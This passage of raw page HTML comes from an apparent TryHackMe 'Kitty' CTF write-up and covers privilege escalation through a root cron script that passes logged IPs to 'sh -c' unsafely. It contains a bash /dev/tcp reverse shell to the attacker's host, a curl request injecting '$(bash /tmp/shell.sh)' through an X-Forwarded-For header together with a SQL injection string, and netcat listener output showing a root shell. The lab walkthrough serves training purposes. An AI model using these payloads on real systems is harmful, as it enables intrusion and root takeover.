<\/span><span style=\"color: #C3E88D\">version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v1.2.1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Commit<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SHA:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">f9e6a1590a4312b9faa093d8dc84e19567977a6d<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">     <\/span><span style=\"color: #FFCB6B\">\u2588\u2588\u2593\u2588\u2588\u2588<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2588\u2588\u2588\u2588<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2593\u2588\u2588\u2588<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2593\u2588\u2588<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2593<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">\u2593\u2588\u2588\u2591<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2592\u2592\u2588\u2588<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2593\u2588\u2588\u2591<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2592\u2592\u2588\u2588<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2592<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">\u2593\u2588\u2588\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2593\u2592\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2593\u2588\u2588\u2584<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">\u2593\u2588\u2588\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2593\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2592\u2588\u2588<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2591<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">\u2592\u2588\u2588\u2584\u2588\u2593\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2592<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2592<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2592\u2592\u2588\u2588\u2584\u2588\u2593\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2590\u2588\u2588\u2593\u2591<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">\u2592\u2588\u2588\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2591\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2592\u2592\u2592\u2588\u2588\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2592\u2593\u2591<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">\u2592\u2593\u2592\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2591\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2592\u2593\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591\u2592\u2593\u2592\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2588\u2588\u2592\u2592\u2592<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">\u2591\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591\u2592<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591\u2591\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">\u2593\u2588\u2588<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591\u2592\u2591<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">\u2591\u2591<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">\u2591\u2591<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2592<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591\u2591<\/span><span style=\"color: #BABED8\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                   <\/span><span style=\"color: #FFCB6B\">\u2591<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">     <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                               <\/span><span style=\"color: #FFCB6B\">\u2591<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2591<\/span><span style=\"color: #BABED8\">    <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                               <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> <\/span><span style=\"color: #82AAFF\">..<\/span><span style=\"color: #BABED8\">&lt;SNIPPED&gt;<\/span><span style=\"color: #82AAFF\">..<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">2024\/02\/06<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">01<\/span><span style=\"color: #C3E88D\">:43:32<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CMD:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">UID=<\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">PID=<\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">\/sbin\/init<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">maybe-ubiquity<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">2024\/02\/06<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">01<\/span><span style=\"color: #C3E88D\">:44:01<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CMD:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">UID=<\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">PID=<\/span><span style=\"color: #F78C6C\">1616<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">\/usr\/sbin\/CRON<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-f<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">2024\/02\/06<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">01<\/span><span style=\"color: #C3E88D\">:44:01<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CMD:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">UID=<\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">PID=<\/span><span style=\"color: #F78C6C\">1615<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">\/usr\/sbin\/CRON<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-f<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">2024\/02\/06<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">01<\/span><span style=\"color: #C3E88D\">:44:01<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CMD:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">UID=<\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">PID=<\/span><span style=\"color: #F78C6C\">1617<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">\/bin\/sh<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-c<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/usr\/bin\/bash<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/opt\/log_checker.sh<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">2024\/02\/06<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">01<\/span><span style=\"color: #C3E88D\">:44:01<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CMD:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">UID=<\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">PID=<\/span><span style=\"color: #F78C6C\">1618<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">\/usr\/bin\/bash<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/opt\/log_checker.sh<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Let&#8217;s check the file contents to understand what is happening.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"kitty@kitty:\/tmp$ cat \/opt\/log_checker.sh \n#!\/bin\/sh\nwhile read ip;\ndo\n  \/usr\/bin\/sh -c &quot;echo $ip &gt;&gt; \/root\/logged&quot;;\ndone &lt; \/var\/www\/development\/logged\ncat \/dev\/null &gt; \/var\/www\/development\/logged\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/tmp$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/opt\/log_checker.sh<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #464B5D; font-style: italic\">#!\/bin\/sh<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">while<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #82AAFF\">read<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ip<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">do<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">\/usr\/bin\/sh<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-c<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">echo <\/span><span style=\"color: #BABED8\">$ip<\/span><span style=\"color: #C3E88D\"> &gt;&gt; \/root\/logged<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">done<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\"> \/var\/www\/development\/logged<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">cat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/dev\/null<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/var\/www\/development\/logged<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Let&#8217;s break down the script and try to understand what it is doing:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The script reads IP addresses from a file located at <code>\/var\/www\/development\/logged<\/code><\/li>\n\n\n\n<li>Next, appends each IP address to the file <code>\/root\/logged<\/code><\/li>\n\n\n\n<li>Lastly, clears the original file <code>\/var\/www\/development\/logged<\/code><\/li>\n<\/ul>\n\n\n\n<p>Examining the script, we can also see that it loops through each line of the logged file and saves the contents to another file. We can see that it is vulnerable to command injection via the\u00a0<strong>sh -c &#8220;echo $ip<\/strong>\u00a0line. We don&#8217;t have write access to the script but because we control what goes on this file, we can achieve command injection and try to get a reverse shell as root.<\/p>\n\n\n\n<p>Let&#8217;s create a bash script with a reverse shell one-liner.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"kitty@kitty:~$ cd \/tmp\nkitty@kitty:\/tmp$ nano shell.sh\nkitty@kitty:\/tmp$ cat shell.sh \nbash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.13.1.112\/4444 0&gt;&amp;1'\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:~$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/tmp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/tmp$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nano<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">shell.sh<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/tmp$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">shell.sh<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">bash<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-c<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">bash -i &gt;&amp; \/dev\/tcp\/10.13.1.112\/4444 0&gt;&amp;1<\/span><span style=\"color: #89DDFF\">&#39;<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Now, if we run the cURL command below, we would get the shell as root!<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"kitty@kitty:\/tmp$ curl 'http:\/\/127.0.0.1:8080\/index.php' -d &quot;username=blah' OR '1'='1-- -&amp;password=blah&quot; -H 'X-Forwarded-For: $(bash \/tmp\/shell.sh)'\n\nSQL Injection detected. This incident will be logged!\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/tmp$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">http:\/\/127.0.0.1:8080\/index.php<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-d<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">username=blah&#39; OR &#39;1&#39;=&#39;1-- -&amp;password=blah<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-H<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">X-Forwarded-For: $(bash \/tmp\/shell.sh)<\/span><span style=\"color: #89DDFF\">&#39;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Injection<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">detected.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">This<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">incident<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">will<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">be<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">logged!<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty]\n\u2514\u2500$ nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [10.13.1.112] from (UNKNOWN) [10.10.49.10] 60092\nbash: cannot set terminal process group (2264): Inappropriate ioctl for device\nbash: no job control in this shell\nroot@kitty:~# \n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/Kitty<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 